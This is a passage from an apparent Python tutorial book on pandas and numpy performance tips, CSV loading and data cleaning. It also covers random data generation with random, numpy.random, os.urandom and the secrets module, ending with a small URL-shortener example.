%%timeit
dataset_1.merge(dataset_2, on='dataset_id')

439 ms ± 24.5 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

%%timeit
df_1 = dataset_1.set_index('dataset_id')
df_2 = dataset_2.set_index('dataset_id')
df_1.merge(df_2, left_index=True, right_index=True)

393 ms ± 17.4 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

The speedup noticed here also extends to single-element lookups in the indexed dataframe (using .loc on the index).
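A hedged sketch of the same effect for single-element lookups, assuming numpy and pandas are imported as np and pd; the dataframe and column names here are hypothetical:

df = pd.DataFrame({'item_id': np.arange(1_000_000),
                   'value': np.random.randn(1_000_000)})

# Without an index: a full scan of the 'item_id' column.
row = df[df['item_id'] == 987_654]

# With an index: a label-based lookup via .loc, typically much faster.
indexed = df.set_index('item_id')
row = indexed.loc[987_654]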

Vectorize your Dataframe operations

Vectorization refers to the process of performing operations on the complete array. Like Numpy, Pandas also has support for optimized vector operations. Always avoid plain for loops when working with Dataframes, as they make read/write operations quite costly. If iteration is unavoidable, APIs like .map() and .apply() are the better options, with full vectorization as the preferred alternative. Look at the following comparative stats:

# ---- Using .iloc[] ----
%%timeit
nprc = np.zeros(len(prc,))
for i in range(len(prc)):
    nprc[i] = (prc.iloc[i]['price'] - minPrc) / (maxPrc - minPrc)
prc['nprc'] = nprc

8.91 s ± 479 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using .iterrows() ----
%%timeit
nprc = np.zeros(len(prc,))
for i, row in prc.iterrows():
    nprc[i] = (row['price'] - minPrc) / (maxPrc - minPrc)
prc['nprc'] = nprc

3.99 s ± 346 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using .loc[] ----
%%timeit
nprc = np.zeros(len(prc,))
for i in range(len(nprc)):
    nprc[i] = (prc.loc[i, 'price'] - minPrc) / (maxPrc - minPrc)
prc['nprc'] = nprc

408 ms ± 61.2 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)

# ---- Using .map() ----
%%timeit
prc['nprc'] = prc['price'].map(lambda x: (x - minPrc) / (maxPrc - minPrc))

39.8 ms ± 2.33 ms per loop (mean ± std. dev. of 7 runs, 10 loops each)

# ---- Using vectorization ----
%%timeit
prc['nprc'] = (prc['price'] - minPrc) / (maxPrc - minPrc)

1.76 ms ± 107 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)

As evident from the runs, vectorization gives a speedup of several thousand times compared to the .iloc[]-based loop. Therefore, vectorise wherever possible.

Optimize Dataframe multiplication

When multiplying dataframes, we have an option to use one of the following three methods:

Using the * operator between dataframes.

Using the .multiply() method of the Dataframe.

Using the .multiply() method of numpy.

The performance metrics for the same dataset among these methods is outlined as follows:

data = np.random.randn(100, 4)
df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd'])
data = np.random.randn(100, 4)
df2 = pd.DataFrame(data, columns=['a', 'b', 'c', 'd'])

%%timeit
df * df2

355 µs ± 68.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit
df.multiply(df2)

296 µs ± 42.4 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit
np.multiply(df, df2)

120 µs ± 4.11 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)

We see that the multiply method of numpy is about ~60% faster than Pandas' multiply method and ~66% faster than the regular multiplication using the * operator. Using the numpy method is more performant and more Pythonic for most cases.

Using sum() of Numpy instead of sum() of Pandas

NumPy is again the go-to library for summing up the values in your DF. The latest versions of Pandas come with the .to_numpy() conversion API, which can be used before summing up the values. Check out the performance stats comparing this approach to the native sum() on the Dataframe:

data = np.random.randn(100, 4)
df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd'])

%%timeit
df.sum()

376 µs ± 47.2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit
df.to_numpy().sum()

18.6 µs ± 1.23 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)

Thus, using the Numpy-based sum for DataFrames shows a 95% reduction in the computation time. Therefore, using the numpy-based sum is considered one of the best practices.

Using percentile of Numpy rather than quantile of Pandas for smaller arrays

In the latest Pandas versions, when your dataset is smaller, prefer to use the percentile method of numpy to the quantile method of Pandas.

data = np.random.randn(100, 4)
df = pd.DataFrame(data, columns=['a', 'b', 'c', 'd'])

%%timeit
df.quantile([0.1, 0.4, 0.6, 0.9], axis=1)

1.37 ms ± 103 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

%%timeit
np.percentile(df, np.array([0.1, 0.4, 0.6, 0.9]) * 100, axis=1)

1.17 ms ± 28.2 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)

We see a 15% performance improvement with numpy when the dimensions of the array are relatively smaller. Pandas remains efficient for larger datasets.

How to save time with Datetime data?

Take an example of a sample data that has a column storing a datetime as a string – “1/1/19 10:10”. Pandas and NumPy have a concept of ‘dtypes’, which are nothing but the enforceable data types. The default dtype is an object and is used whenever the user does not specify a type:

>>> df.dtypes
date_time      object

Now, why is this not optimal? The object in this case is a generic container for any column whose datatype cannot be cleanly inferred. In most practical cases, working with dates in the string format is not only suboptimal in terms of memory-efficiency but also cumbersome. When you work with time-series data, you expect the representation of the column to be of the datetime or Timestamp object types. Using Pandas, this can be easily achieved:

>>> df['date_time'] = pd.to_datetime(df['date_time'])
>>> df['date_time'].dtype
datetime64[ns]

Let us compare the performance of this conversion with and without an explicit format, on a significantly large data set, by using a timeit operation. The results are significant:

The object representation records a time of about 1.6 seconds for 8760 rows in the dataset.

On the other hand, when we specify the format of the datetime in Pandas by using the format parameter, we have the following:

>>> @timeit(repeat=3, number=100)
... def convert_with_format(df, column_name):
...     return pd.to_datetime(df[column_name],
...                           format='%d/%m/%y %H:%M')

Best of 3 trials with 100 function calls per trial:
Function `convert_with_format` ran in average of 0.032 seconds.
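The @timeit decorator used in these snippets is a timing helper and not part of Pandas; if it is not already defined in your environment, a minimal sketch along these lines (built on the standard timeit module, with a hypothetical output format) would behave similarly:

import functools
import timeit as _timeit

def timeit(repeat=3, number=100):
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            # Time `number` calls, `repeat` times, and report the best average per call.
            timer = _timeit.Timer(lambda: func(*args, **kwargs))
            best = min(timer.repeat(repeat=repeat, number=number)) / number
            print(f"Best of {repeat} trials with {number} function calls per trial:")
            print(f"Function `{func.__name__}` ran in average of {best:.3f} seconds.")
            return func(*args, **kwargs)
        return wrapper
    return decorator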

The results noted here show about a 50x speed improvement, because Pandas now does not have to individually inspect every cell in the column to determine its data type. A detail to keep in mind is that the source timestamps here are not ISO 8601 adherent – for that, they would need to be in the YYYY-MM-DD HH:MM format. If a format is not specified, Pandas will use the dateutil library for converting the strings to dates. However, if your raw data is already in the ISO 8601 format, you will see improved performance in applications that involve heavy date parsing. Therefore, explicitly specifying the format is a key step for performance improvement. The alternate option here would be to use infer_datetime_format=True in the method parameters, but it should not be one's first choice for date conversions.

Using .itertuples() and .iterrows() for loops

In cases where we need to multiply the column values by a scalar, the process is simply to multiply the dataframe by that scalar. However, if our use case demands a conditional multiplication at each cell level, what do we do? Most developers coming from an upbringing in C++- or Java-like languages would immediately jump to writing a loop here, as they have been trained to do all this time. Suppose you have a use case where you iterate over a Dataframe and apply some processing at every iteration – what would you do? In simple Python terms, one would straight away be thinking about "for each a, conditional on b, do c". When the dataframe is large, this turns out to be a time-consuming and clunky approach. Pandas would consider this an 'anti-pattern', owing to the following:

Firstly, an additional storage would be needed for persisting the results.

Then, you would also be using the opaque range(0, len(df)) object for looping.

You would also be using the concept of 'chained indexing' in the dataframe when something like df.iloc[x]['date_time'] is used.

There is the extensive cost in terms of time associated with this style.

Pandas conventionally does not suggest using constructs like for i in range(len(df)), and hence it comes bundled with the Dataframe.iterrows() and Dataframe.itertuples() functions, which are generator implementations yielding one value at a time.

.itertuples(), on each invocation, returns a namedtuple for the row, where the index value of the row is the first tuple element.

A namedtuple data structure is part of the collections module in Python. It is similar to the Python tuple, except that its fields are accessible by attribute lookup.
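A tiny illustration of a namedtuple, mirroring (hypothetically) the kind of row that .itertuples() yields; the field names here are made up:

from collections import namedtuple

Row = namedtuple('Row', ['Index', 'data_usage', 'date_time'])
row = Row(Index=0, data_usage=1.5, date_time='1/1/19 10:10')

print(row.data_usage)   # attribute access instead of row[1]
print(row[0])           # positional access still works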

.iterrows() yields pairs (tuples) of (index, Series) for each row in the DataFrame. While .itertuples() tends to be a tad bit faster, let us use .iterrows() in this example, because some readers might not have come across namedtuple.

>>> @timeit(repeat=4, number=200)
... def apply_condition_iterrows(df):
...     cost_list = []
...     for index, row in df.iterrows():
...         data_used = row['data_usage']
...         hour = row['date_time'].hour
...         cost = apply_condition(data_used, hour)
...         cost_list.append(cost)
...     df['costs'] = cost_list
...
>>> apply_condition_iterrows(df)

Best of 4 trials with 200 function calls per trial:
Function `apply_condition_iterrows` ran in average of 0.723 seconds.

The preceding syntax presents decluttered row value references and is more explicit, and therefore more readable. In comparison to the use of simple loops, we also note a considerable speedup, in addition to the memory footprint improvement.

Making use of Pandas’ .apply()

The next secret is about how to improve upon the .iterrows() operation that we discussed earlier. We use another Pandas built-in utility, the .apply() method. With this, we can pass a functor as an argument, which is then applied along the rows or columns of the Dataframe, depending on the chosen axis. Let's take a look at the use of a lambda with the function from earlier.

>>> @timeit(repeat=4, number=200)
... def apply_condition_withapply(df):
...     df['costs'] = df.apply(
...         lambda row: apply_condition(
...             kwh=row['data_usage'],
...             hour=row['date_time'].hour),
...         axis=1)
...

>>> apply_condition_withapply(df)

Best of 4 trials with 200 function calls per trial:
Function `apply_condition_withapply` ran in average of 0.263 seconds.

With this format, we achieve a significant drop in the number of lines of code, thereby making it readable and clean. Also, compared to the .iterrows() method, we get more than a 50% improvement in the time consumed.

We are still nowhere close to blazing fast. Although the .apply() method makes use of Cython iterators for its internal loops, the lambda that we used is not directly handleable in Cython, which takes a toll on the speed. We can remedy this by using vectorised operations.

Using .isin() to select data

What exactly do we mean by a vectorized operation? When we had multiplied the dataframe column values by a scalar multiple, it was an example of a vectorized operation. That is how we can harness the speed secret of Pandas. One way to apply the conditioned calculations in the form of vectorised operations is by selecting and grouping the different sections in the Dataframe, based on the conditions, and then applying the vectorised operation to every selected group. Let us now take a look at how we can select dataframe rows in Pandas by using the .isin() function and applying the conditions in a vectorised operation. However, before diving into this, we can set the date_time column as the Dataframe’s index.

df.set_index('date_time', inplace=True)

@timeit(repeat=3, number=100)
def apply_condition_isin(df):
    peak_usage = df.index.hour.isin(range(17, 24))
    normal_usage = df.index.hour.isin(range(7, 17))
    off_peak_usage = df.index.hour.isin(range(0, 7))

    df.loc[peak_usage, 'costs'] = df.loc[peak_usage, 'data_usage'] * 28
    df.loc[normal_usage, 'costs'] = df.loc[normal_usage, 'data_usage'] * 20
    df.loc[off_peak_usage, 'costs'] = df.loc[off_peak_usage, 'data_usage'] * 12

In this example, the .isin() method is returning an array of Boolean values that looks like the following:

[False, False, False, …, True, True, True]

These values correspond to the rows in the dataframe whose index hour lies in the specified range. The Boolean array is then passed to the Dataframe's .loc indexer to generate a slice of the Dataframe containing only the rows that match the specified hours. The slice is then multiplied by the corresponding cost, which is a vectorised operation and hence faster. Unlike the loop-based solutions, the conditional logic here is part of the row-selection logic rather than the per-row processing. This also reduces the number of lines in the code.

We observe about 315 times faster performance compared to the loop-based implementation, a 71x speedup in comparison to the .iterrows() version, and about a 27x speedup when compared with the .apply() method implementation. This eases the process of operating on larger datasets.

Improving the speed further?

You will notice that in apply_condition_isin(), we are still doing some manual work: the calls to df.loc and df.index.hour.isin() are made three times each. You could argue that this solution is not scalable if we had a more granular range of time slots. (A different rate for each hour would require 24 .isin() calls.) Pandas allows us to handle this in a more programmatic manner with the use of the pd.cut() function:

@timeit(repeat=3, number=100)
def apply_condition_cut(df):
    ind_cost = pd.cut(x=df.index.hour,
                      bins=[0, 7, 17, 24],
                      include_lowest=True,
                      labels=[12, 20, 28]).astype(int)
    df['costs'] = ind_cost * df['data_usage']

Depending on the bin that each hour falls into, pd.cut() applies the corresponding label from the labels array. The parameter include_lowest indicates whether the first interval is left-inclusive or not. This is a completely vectorised way to get the result, with near-optimal timing. Until now, we have managed to bring down the time cost from about an hour to within a second for processing a 300-site data set. We still have one more option to explore. In the next section, we will be looking at how Numpy methods can be used to manipulate the underlying arrays of a Dataframe and then combine the results back.

Sprinkle some Numpy magic

The Numpy library is the underlying backbone for Pandas Dataframes and Series. This proves advantageous as we can seamlessly integrate Pandas operations and Numpy arrays.

prices = np.array([12, 20, 28])
bins = np.digitize(df.index.hour.values, bins=[7, 17, 24])
df['costs'] = prices[bins] * df['data_usage'].values

Similar to the cut() function, this syntax is wonderfully concise and easy to comprehend. How does it fare in terms of performance? We notice a marginal runtime improvement compared to the previous option.

Hence, the gist of what we discussed in this section can be summed up in a hierarchical manner. The suggested improvements, generally sorted from the fastest to the slowest and in order of the most to least flexible, are as follows:

Use of vectorized operations – the use of Pandas and NumPy operations.

Utilizing the .apply() function with a lambda/functor as an argument.

Use the .itertuples() function to iterate over the rows in a DF as namedtuples.

Using the .iterrows() method over the rows as pairs. However, in this approach, it is costly to create the Series from rows, and accessing them.

The age-old method of loops, with the use of df.loc and df.iloc over each cell or row in the Dataframe.

Using HDFStore to avoid reprocessing

After looking at the ways to speed up our data processing in Pandas, let us discuss a method to avoid reprocessing in the entirety using a newly integrated Pandas feature, called HDFStore.

Sometimes, when we are working on a complex data model, the efficient way to go about it is to pre-process our data set. Let us assume that we have 10 years of usage details for a telecom operator, stored at minute precision. Just converting the date and time data into Python datetime objects would take about 20 minutes, even when providing the format parameter. In any practical scenario, operations like this should only be done once as a pre-processing step, rather than every time the model runs. The pre-processed data can then be stored in that form and directly loaded when needed. We could save this as a text file or in a CSV format. However, this would lead to a loss of the converted datetime objects.
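As a sketch of the kind of one-off conversion being described, the date parsing could look something like the following; the column name and the format string are illustrative assumptions.

# Parse the string timestamps once, as a pre-processing step,
# instead of on every run of the model. The 'date_time' column name
# and the format string are assumptions for illustration.
df['date_time'] = pd.to_datetime(df['date_time'], format='%d/%m/%y %H:%M')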

For storing tabular data, Pandas presents us with HDF5 files that can be used as a high-performance storage format. With the help of the HDFStore in Pandas, a Dataframe can be stored in the form of an HDF5 file that preserves the columns, data types, and metadata, while retaining fast access. You can think of it as a class with read and write features similar to the dictionaries in Python. Let us look at how a Dataframe can be stored as an HDF5 file and read back:

# Access the data store
data_store = pd.HDFStore('processed_data.h5')

# Store the pre-processed Dataframe under a named key
data_store['preprocessed_df'] = preprocessed_df

# Retrieve the data later using the same key
preprocessed_df = data_store['preprocessed_df']
data_store.close()

Multiple tables can be stored in a datastore, using a named key for each. An important point to note is that you are required to have PyTables >= 3.0.0 installed for optimally using the HDFStore in Pandas.
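To illustrate the named keys, here is a minimal sketch of writing several pre-processed tables into a single store; the Dataframe names and keys are assumptions for illustration.

# Keep several pre-processed tables in one HDF5 store, one per key.
# usage_df and billing_df are hypothetical Dataframes.
with pd.HDFStore('processed_data.h5') as store:
    store['usage_df'] = usage_df
    store['billing_df'] = billing_df
    print(store.keys())   # e.g. ['/billing_df', '/usage_df']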

Python and CSV data processing

Despite the hatred that most millennials have for Excel, let us face it, it is not going anywhere. Companies of all scales use Excel to manage data of some form or another. For the more tech-savvy audience, Python comes to the rescue by providing interesting APIs and the flexibility to bend the data at your will, thereby assisting in the automation of several processes. In this section, we will look at the different nuances of processing CSV and Excel data sheets in Python. A CSV file (Comma Separated Values file) is a type of plain text file that uses specific structuring to arrange the tabular data. Because it is a plain text file, it can contain only the actual text data—in other words, printable ASCII or Unicode characters.

import csv

with open('employee_birthday.txt') as csv_file:
    csv_reader = csv.reader(csv_file, delimiter=',')
    for row in csv_reader:
        print(row)

However, let us pull out the weapons of mass destruction, assuming that our dataset is rather large – in other words, Pandas.

import pandas as pd

# Read the file

data = pd.read_csv("Accidents7904.csv", low_memory=False)

By default, Pandas uses a zero-based integer index if nothing is explicitly specified. To use a different column as the DataFrame index, add the index_col optional parameter:

df = pd.read_csv('hrdata.csv', index_col='Name')

If your data contains dates that are stored as strings, you can force Pandas to read them as dates with the parse_dates optional parameter, which is defined as a list of column names to treat as dates:

df = pd.read_csv('hrdata.csv', index_col='Name', parse_dates=['Hire Date'])

If your CSV files do not have the column names in the first line, you can use the names optional parameter to provide a list of column names. You can also use this if you want to override the column names provided in the first line. In this case, you must also tell Pandas to ignore the existing column names using the header=0 optional parameter:

df = pd.read_csv('hrdata.csv', index_col='Employee',
                 parse_dates=['Hired'], header=0,
                 names=['Employee', 'Hired', 'Salary', 'Sick Days'])

Once you are done with all the processing of the data, you can dump the DataFrame back to a CSV using the to_csv method:

df.to_csv('hrdata_modified.csv')

Now, what if you have a huge dataset, say more than 6 GB in size – how do you optimize the read so that it does not choke the system memory completely? The Pandas API provides an option to read these files in chunks, assuming that you do not need the entire dataset in memory at the same time.

chunksize = 10 ** 6
for chunk in pd.read_csv(filename, chunksize=chunksize):
    process(chunk)

The chunksize parameter specifies the number of rows per chunk. (The last chunk may contain fewer than chunksize rows, of course.) However, chunking should not always be the first solution for this problem.

If the file is large due to repeated non-numeric or unwanted columns, you can sometimes see massive memory improvements by simply reading those columns in as categories and selecting only the required columns using the usecols parameter of pd.read_csv. If your workflow requires many manipulations, slicing, or exporting, you can use dask.dataframe to perform the operations iteratively. Dask silently performs chunking under the hood and supports a subset of the Pandas API. Dask is an evolving library that can handle large CSV files rather efficiently, with the optimizations performed under the hood and without the user having to interfere much.

import dask.dataframe as dd
filename = '311_Service_Requests.csv'
df = dd.read_csv(filename, dtype='str')

Unlike Pandas, the data is not read into memory. We have just set up the dataframe to be ready to run some compute functions on the data in the CSV file, using the familiar functions from Pandas. We built a new dataframe using Pandas’ filters without loading the entire original data set into memory. It may not seem like much, but when working with a 7+ GB file, you can save a great deal of time and effort using Dask. Dask has a ton of other great features that are out of the scope of this book, but are outlined really well in the official Dask documentation.
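Tying back to the earlier point about usecols and categorical columns, a minimal sketch of a memory-friendly read might look like the following; the column names are assumptions for illustration.

# Read only the columns that are needed and load repetitive text
# columns as categories. The column names below are hypothetical.
df = pd.read_csv('Accidents7904.csv',
                 usecols=['Accident_Severity', 'Date', 'Weather_Conditions'],
                 dtype={'Accident_Severity': 'category',
                        'Weather_Conditions': 'category'})
print(df.memory_usage(deep=True))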

Data cleaning with Pandas and Numpy

Data scientists spend a large amount of their time cleaning datasets and getting them down to a form with which they can work. In fact, many data scientists argue that the initial steps of obtaining and cleaning the data constitute 80% of the job.

Dropping unnecessary columns in a DataFrame

Pandas provides a handy way of removing the unwanted columns or rows from a DataFrame with the drop() function. Let us look at a simple example where we drop a number of columns from a DataFrame.

>>> df = pd.read_csv('/data/Images-Book.csv')
>>> df.head()

>>> to_drop = ['Edition Statement',
…              'Corporate Author',
…              'Corporate Contributors',
…              'Former owner',
…              'Engraver',
…              'Contributors',
…              'Issuance type',
…              'Shelfmarks']

>>> df.drop(to_drop, inplace=True, axis=1)

We call the drop() function on our object, passing in the inplace parameter as True and the axis parameter as 1. This tells Pandas that we want the changes to be made directly in our object and that it should look for the values to be dropped in the columns of the object. Alternatively, we could also remove the columns by passing them to the columns parameter directly instead of

separately specifying the labels to be removed and the axis where Pandas should look for the labels:

df.drop(columns=to_drop, inplace=True)

Changing the index of a DataFrame

A Pandas Index extends the functionality of NumPy arrays to allow for more versatile slicing and labeling. In many cases, it is helpful to use a uniquely valued identifying field of the data as its index.

>>> df['Identifier'].is_unique
True

>>> df = df.set_index('Identifier')
>>> df.head()

Unlike primary keys in SQL, a Pandas Index does not assure uniqueness, although many indexing and merging operations will run faster if the index is unique.

You may have noticed that we reassigned the variable to the object returned by the method with df = df.set_index('Identifier'). This is due to the default behaviour, where the method returns a modified copy of our object and does not make the changes directly to the object. This can be avoided by setting the inplace parameter:

df.set_index('Identifier', inplace=True)

Clean columns with .str() methods

We can now get the data to a uniform format to get a better understanding of the dataset and enforce consistency. As discussed earlier, generally a default Dataframe will encapsulate any field that does not fit into a numeric or categorical field cleanly into an object dtype.

Let’s take the following example of cleaning up the date columns:

>>> df.loc[1905:, 'Date of Publication'].head(5)
Identifier
1905           1888
1929    1839, 38-54
2836        [1897?]
2854           1865
2956        1860-63
Name: Date of Publication, dtype: object

The cleaning can be undertaken in the following aspects:

Remove the extra dates in square brackets, wherever present: 1879 [1878].

Convert the date ranges to their “start date”, wherever present: 1860-63; 1839, 38-54.

Completely remove the dates we are not certain about and replace them with NumPy’s NaN: [1897?].

Convert the string “NaN” to NumPy’s NaN value.

Let us take the following example on how the processing can be applied:

>>> regex = r'^(\d{4})'
>>> extr = df['Date of Publication'].str.extract(r'^(\d{4})', expand=False)

>>> extr.head()
Identifier
206    1879
216    1868
218    1869
472    1851
480    1857
Name: Date of Publication, dtype: object

>>> df['Date of Publication'] = pd.to_numeric(extr)
>>> df['Date of Publication'].dtype
dtype('float64')

You may have noticed the use of df['Date of Publication'].str. This attribute is a way to access fast string operations in Pandas that largely mimic the operations on native Python strings or compiled regular expressions. To clean the field, we can combine Pandas str methods with NumPy’s np.where function, which is basically a vectorized form of Excel’s IF() macro. It has the following syntax:

>>> np.where(condition1, x1,
        np.where(condition2, x2,
            np.where(condition3, x3, …)))
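As a small illustration of np.where acting as a vectorized if/else, consider the following sketch that normalizes a hypothetical 'Place of Publication' text column; the column and the city names are assumptions for illustration.

import numpy as np

# Vectorized if/else over a text column: pick a clean label when a
# keyword is found, otherwise tidy up the raw string.
pub = df['Place of Publication']
df['Place of Publication'] = np.where(
    pub.str.contains('London', na=False), 'London',
    np.where(pub.str.contains('Oxford', na=False), 'Oxford',
             pub.str.replace('-', ' ')))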

Element-wise dataset cleanup using the DataFrame.applymap()

Let us consider the following sample dataframe:

            0        1
0        Mock  Dataset
1      Python   Pandas
2        Real   Python
3       NumPy    Clean

In this example, each cell (‘Mock’, ‘Dataset’, ‘Python’, ‘Pandas’, and so on) is an element. Therefore, applymap() will apply a function to each of these independently. Let us assume a function definition in this form:

def do_something(item):
    # process the item
    return processed_item

Pandas’ .applymap() only takes one parameter, which is the function (callable) that should be applied to each element:

>>> towns_df = towns_df.applymap(get_citystate)

The applymap() method took each element from the DataFrame, passed it to the function, and the original value was replaced by the returned value. It is that simple!

While it is a convenient and versatile method, .applymap can have significant runtime for larger datasets, because it maps a Python callable to each individual element. In some cases, it can be more efficient to do vectorized operations that utilize Cython or NumPy (which, in turn, makes calls in C) under the hood.
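For instance, if the element-wise function only reformats strings, a column-wise .str pipeline can often replace .applymap(). The following is a sketch under the assumption that every column of towns_df holds strings.

# Element-wise version (one Python call per cell):
towns_df = towns_df.applymap(lambda s: s.strip().title())

# A vectorized alternative using the .str accessor, one column at a time
# (assumes all columns are string-typed):
for col in towns_df.columns:
    towns_df[col] = towns_df[col].str.strip().str.title()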

Skipping rows and renaming columns for CSV file data

We can skip rows and set the header while reading the CSV file by passing some parameters to the function.

>>> olympics_df = pd.read_csv('/data/olympics.csv', header=1)

To rename the columns, we will make use of a DataFrame’s rename() method, which allows you to relabel an axis based on a mapping (in this case, a dict).

>>> new_names = {'Unnamed: 0': 'Country',
…                '? Summer': 'Summer Olympics',
…                '01 !': 'Gold',
…                '02 !': 'Silver',
…                '03 !': 'Bronze',
…                '? Winter': 'Winter Olympics'}

We call the rename() function on our object:

>>> olympics_df.rename(columns=new_names, inplace=True)

Generating random data

How random is random? This is a weird question to ask, but it is one of paramount importance in cases where information security is of concern. Whenever you are generating random data, strings, or numbers in Python, it is a good idea to have at least an idea of how that data was generated. In this section, we will cover a handful of different options for generating random data in Python, and then build up to a comparison of each in terms of its level of security, versatility, purpose, and speed.

Pseudorandom generators

Probably the most widely known tool for generating random data in Python is its random module, which uses the Mersenne Twister pseudorandom number generator (PRNG) as its core generator. With random.seed(), you can make the results reproducible, and the chain of calls after random.seed() will produce the same trail of data:

>>> import random
>>> random.seed(987)

>>> random.random()
0.5327547554445934

>>> random.random()
0.5288157818367566

>>> random.seed(987)  # Re-seed the randomizer

>>> random.random()
0.5327547554445934

>>> random.random()
0.5288157818367566

The sequence of random numbers becomes deterministic, or completely determined by the seed value, 987. Here are some other common uses of the random API:

>>> random.randint(500, 50000)
18601

>>> random.randrange(1, 10)
5

>>> random.uniform(20, 30)
27.42639687016509

>>> random.uniform(30, 40)
36.33865802745107

>>> items = ['one', 'two', 'three', 'four', 'five']
>>> random.choice(items)
'four'

>>> random.choices(items, k=2)
['three', 'three']

>>> random.choices(items, k=3)
['three', 'five', 'four']

# To mimic sampling without replacement, use random.sample()
>>> random.sample(items, 4)
['one', 'five', 'four', 'three']

# In place randomization can be achieved with random.shuffle()
>>> random.shuffle(items)
>>> items
['four', 'three', 'two', 'one', 'five']

PRNGs for arrays – using random and Numpy

If you wanted to generate a sequence of random numbers, one way to achieve that would be with a Python list comprehension:

>>> [random.random() for _ in range(5)]
[0.021655420657909374, 0.4031628347066195, 0.6609991871223335,
 0.5854998250783767, 0.42886606317322706]

But there is another option that is specifically designed for this. You can think of NumPy’s own numpy.random package as being like the standard library’s random, but for NumPy arrays. (It also comes loaded with the ability to draw from a lot more statistical distributions.) Note that numpy.random uses its own PRNG that is separate from plain old random. You won’t produce deterministically random NumPy arrays with a call to Python’s own random.seed():

>>> import numpy as np
>>> np.random.seed(444)
>>> np.set_printoptions(precision=2)

>>> # Samples from the standard normal distribution
>>> np.random.randn(5)
array([ 0.36,  0.38,  1.38,  1.18, -0.94])

>>> np.random.randn(3, 4)
array([[-1.14, -0.54, -0.55,  0.21],
       [ 0.21,  1.27, -0.81, -3.3 ],
       [-0.81, -0.36, -0.88,  0.15]])

>>> # `p` is the probability of choosing each element
>>> np.random.choice([0, 1], p=[0.6, 0.4], size=(5, 4))
array([[0, 0, 1, 0],
       [0, 1, 1, 1],
       [1, 1, 1, 0],
       [0, 0, 0, 1],
       [0, 1, 0, 1]])

>>> # NumPy's `randint` is [inclusive, exclusive), unlike `random.randint()`
>>> np.random.randint(0, 2, size=25, dtype=np.uint8).view(bool)
array([ True, False,  True,  True, False,  True, False, False, False,
       False, False,  True,  True, False, False, False,  True, False,
        True, False,  True,  True,  True, False,  True])

Before we move on, let us summarize some random functions and their numpy.random counterparts:

Figure 6.2: Random and NumPy counterparts

It is important to note here that NumPy is specialized for building and manipulating large, multidimensional arrays. If you just need a single value, random will suffice and will probably be faster as well. For small sequences, random may be faster as well, because NumPy does come with some overhead.

urandom() in Python – CSPRNG

Python’s os.urandom() function is used by both the secrets and the uuid modules as a Cryptographically Secure Pseudo Random Number Generator (CSPRNG). Without getting into much detail, os.urandom() generates operating-system-dependent random bytes that can safely be called cryptographically secure.

On the Unix operating systems, it reads random bytes from the special file /dev/urandom, which in turn allows access to the environmental noise collected from device drivers and other sources. This is garbled information that is particular to your hardware and system state at an instance in time, but at the same time, sufficiently random.

On Windows, the CryptGenRandom() function from the Windows CryptoAPI is used. This function is still technically pseudorandom, but it works by generating a seed value from variables such as the process ID, memory status, and so on.

With os.urandom(), there is no concept of manually seeding. While still technically pseudorandom, this function better aligns with how we think of randomness. The only argument is the number of bytes to return:

>>> import os
>>> os.urandom(3)
b'\xa2\xe8\x02'

>>> x = os.urandom(6)
>>> x
b'\xce\x11\xe7"!\x84'

>>> type(x), len(x)
(bytes, 6)

Calling .hex() on a bytes object gives an str of hexadecimal numbers, with each corresponding to a decimal number from 0 through 255:

>>> list(x)
[206, 17, 231, 34, 33, 132]

>>> x.hex()
'ce11e7222184'

>>> len(x.hex())
12

Now, how is x.hex() 12 characters long, even though x is only 6 bytes? This is because two hexadecimal digits correspond precisely to a single byte. The str version of the bytes will always be twice as long as far as our eyes are concerned. Even if a byte does not need a full 8 bits to be represented, x.hex() will always use two hex digits per byte, so the number 1 will be represented as 01 rather than just 1. Mathematically, though, both of these are the same size.

What we see here is how a bytes object becomes a Python str. Another technicality is how the bytes produced by os.urandom() get converted to a float in the interval [0.0, 1.0), as in the cryptographically secure version of random.random(). The key ingredient is int.from_bytes(), which makes the initial conversion to an integer using a base-256 numbering system.
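If you want to try the idea out, a minimal sketch could look like the following; the choice of 7 bytes is an illustrative assumption, not the exact recipe used internally.

import os

# Interpret random bytes as a big-endian (base-256) integer and scale
# it into [0.0, 1.0). Seven bytes give 56 bits of randomness here.
raw = os.urandom(7)
as_int = int.from_bytes(raw, byteorder='big')
as_float = as_int / (2 ** 56)
print(as_float)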

Python 3+ secrets module

Introduced in Python 3.6 by PEP 506, the built-in secrets module is intended to be the de facto module in Python for the generation of random strings and bytes that are also cryptographically secure.

This module is a tiny one with just about 25 lines of code and is a wrapper around os.urandom(), exposing only a selected set of functions for generating random numbers, bytes, and strings.

>>> import secrets
>>> n = 16

>>> # Generate secure tokens
>>> secrets.token_bytes(n)
b'A\x8cz\xe1o\xf9!;\x8b\xf2\x80pJ\x8b\xd4\xd3'

>>> secrets.token_hex(n)
'9cb190491e01230ec4239cae643f286f'

>>> secrets.token_urlsafe(n)
'MJoi7CknFu3YN41m88SEgQ'

>>> # Secure version of `random.choice()`
>>> secrets.choice('rain')
'a'

Let us understand this with the help of an example. We have all used a URL shortener at some point. The basic idea behind one of these is that, given a long URL, it generates a random string that has not been previously generated and then maps it to the original URL. Let us build a prototype using secrets.

from secrets import token_urlsafe

DATABASE = {}

def shorten(url: str, nbytes: int = 5) -> str:
    ext = token_urlsafe(nbytes=nbytes)
    if ext in DATABASE:
        return shorten(url, nbytes=nbytes)
    else:
        DATABASE.update({ext: url})
        return f'short.ly/{ext}'

This may not be exactly what services like bit.ly do under the hood, but it gives the general idea.

>>> urls = (
…     'https://realpython.com/',
…     'https://docs.python.org/3/howto/regex.html'
… )

>>> for u in urls:
…     print(shorten(u))
short.ly/p_Z4fLI

short.ly/fuxSyNY

